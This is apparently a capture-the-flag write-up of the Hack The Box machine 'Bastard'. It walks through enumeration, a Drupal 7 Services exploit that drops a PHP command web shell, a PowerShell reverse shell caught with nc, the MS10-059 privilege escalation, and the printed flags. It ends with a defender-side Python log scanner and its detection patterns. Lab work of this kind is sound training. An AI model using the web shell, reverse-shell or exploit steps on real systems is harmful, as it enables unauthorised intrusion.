###### tags: `htb` `writeup`

# Bastard

## enum

### nmap -sS

```
└─$ sudo nmap -sS 10.10.10.9
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-01 06:33 EDT
Nmap scan report for 10.10.10.9
Host is up (0.20s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown
```

-sSVC

```
└─$ sudo nmap -sSVC 10.10.10.9
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-01 06:34 EDT
Nmap scan report for 10.10.10.9
Host is up (0.18s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
```

### whatweb

```
└─$ whatweb 10.10.10.9
http://10.10.10.9 [200 OK] Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.9], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Microsoft-IIS[7.5], PHP[5.3.28,], PasswordField[pass], Script[text/javascript], Title[Welcome to 10.10.10.9 | 10.10.10.9], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.3.28, ASP.NET]
```

## Drupal 7 remote code execution

Searching for "drupal 7":

![](https://i.imgur.com/eoVMIk0.png)

I found this RCE exploit on exploit-db: https://www.exploit-db.com/exploits/41564

I modified these parameters in the exploit:

```php
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php system($_REQUEST["cmd"]); ?>'
];
```

Run this exploit and two files are output (user.json, session.json).

Add the cookie parameter using a cookie manager:

- cookie parameter (from session.json)
  - URL: http://10.10.10.9
  - Name: SESSd873f26fc11f2b7e6e4aa0f6fce59913
  - Value: ymHCHpuybdmy_cYnGX0Mn7GXLQvu2prm7I5q7vZsCcE

Then, reloading the web page, I get the admin (created account) page.

Access the injected page with a GET request, passing the OS command in the `cmd` parameter.

***using this query***

```
GET /dixuSOspsOUU.php?cmd=dir
```

![](https://i.imgur.com/HOKkIJV.png)

## reverse shell

I used this payload to get a reverse shell:

```
powershell -e <base64-encoded payload>
```

I ran this command on the local machine:

```
└─$ rlwrap nc -nlvp 1234
listening on [any] 1234 ...
```

Injecting it through the RCE vulnerability I just explained, I get a reverse shell like this:

```
PS C:\inetpub\drupal-7.54>
```

### get user.txt

I change directory to `C:\Users\dimitris\Desktop` and run `ls`:

```
ls

    Directory: C:\Users\dimitris\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-ar--          2/9/2022   2:30 ??         34 user.txt
```

and `Get-Content`:

```
Get-Content user.txt
2977f52ab3fc66d2a4559027118f36fb
```

## priv esc

Windows OS information:

```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
```

Full systeminfo:

```
systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-402-3582622-84461
Original Install Date:     18/3/2017, 7:04:46 ??
System Boot Time:          2/9/2022, 2:29:27 ??
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
                           [02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.575 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.602 MB
Virtual Memory: In Use:    493 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9
```

exploit suggester:

```
└─$ python2 windows-exploit-suggester.py --database 2022-09-03-mssb.xls --systeminfo ~/ctf/htb/Basterd/basterd_systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
```

I use the MS10-059 exploit: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

Git clone this exploit, launch impacket-smbserver on kali, and fetch it from Windows over SMB:

```
copy \\10.10.14.9\kali\MS10-059.exe MS-10-059.exe
```

For using this exploit I referenced this site: https://kakyouim.hatenablog.com/entry/2020/05/27/010807#MS13-005-medium

Listen with nc on kali:

```
rlwrap nc -nlvp 123
```

Run the exploit:

```
./MS-10-059.exe 10.10.14.9 123
```

I get a SYSTEM shell:

```
whoami
nt authority\system
C:\inetpub\drupal-7.54>
```

### get root.txt

```
type root.txt
ecebe2150f1c86df3e33dd93902c3184
C:\Users\Administrator\Desktop>
```
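As an added defender-side example (not part of this writeup), a small IIS log scan for the traces the web stage of this chain leaves behind: requests to the Services REST endpoint under `/rest`, a PHP file in the web root that Drupal 7 core did not ship (here `dixuSOspsOUU.php`), a `cmd=` query parameter, and an encoded `powershell -e` command from the reverse-shell step. The W3C log lines are constructed for the example, and the allowlist of core PHP files assumes the web root holds nothing else.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines modelled on the requests in this writeup:
# the Services endpoint under /rest, then the dropped PHP file called with ?cmd=.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2022-09-01 10:30:00 10.10.10.9 GET / - 80 - 10.10.14.20 Mozilla/5.0 200
2022-09-01 10:35:12 10.10.10.9 POST /rest/user/login - 80 - 10.10.14.9 python-requests/2.28 200
2022-09-01 10:35:20 10.10.10.9 GET /dixuSOspsOUU.php cmd=dir 80 - 10.10.14.9 Mozilla/5.0 200
2022-09-01 10:40:00 10.10.10.9 GET /dixuSOspsOUU.php cmd=powershell+-e+JABjAGwAaQ 80 - 10.10.14.9 Mozilla/5.0 200
2022-09-01 10:41:00 10.10.10.9 GET /cron.php cron_key=abc 80 - 10.10.14.20 Mozilla/5.0 200
"""

# Top-level PHP files shipped by Drupal 7 core; assumption: the web root holds no others.
DRUPAL7_TOPLEVEL_PHP = {"/index.php", "/cron.php", "/install.php",
                        "/update.php", "/authorize.php", "/xmlrpc.php"}
REST_ENDPOINT = "/rest"  # the endpoint_path used by the exploit in this writeup

# powershell -e / -enc / -EncodedCommand followed by a base64 blob, as in the reverse-shell payload
ENCODED_PS = re.compile(r"powershell(\.exe)?\s+[-/](e|ec|enc|encodedcommand)\b", re.I)
CMD_PARAM = re.compile(r"(^|&)cmd=", re.I)

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def scan_iis_log(text):
    """Return (alerts, suspects). alerts is a list of (client_ip, uri_stem, reason);
    suspects is the set of clients that both used the REST endpoint and hit an
    unknown PHP file, i.e. the full Services-module-to-webshell chain."""
    alerts, rest_clients, shell_clients = [], set(), set()
    for rec in parse_w3c(text):
        stem, client = rec["cs-uri-stem"], rec["c-ip"]
        query = unquote_plus(rec["cs-uri-query"])
        if stem.startswith(REST_ENDPOINT + "/"):
            rest_clients.add(client)
        # a .php directly in the web root that core did not ship is a dropped file
        if stem.endswith(".php") and stem.count("/") == 1 and stem not in DRUPAL7_TOPLEVEL_PHP:
            alerts.append((client, stem, "unknown top-level PHP file"))
            shell_clients.add(client)
        if CMD_PARAM.search(query):
            alerts.append((client, stem, "cmd= parameter (webshell style)"))
        if ENCODED_PS.search(query):
            alerts.append((client, stem, "encoded PowerShell command in query"))
    return alerts, rest_clients & shell_clients

if __name__ == "__main__":
    found, chain = scan_iis_log(SAMPLE_LOG)
    for a in found:
        print(*a)
    print("full chain from:", sorted(chain))
```

Pairing the unknown-PHP alert with the missing hotfixes the systeminfo output shows (Hotfix(s): N/A) is what makes this host a one-step path from web shell to SYSTEM.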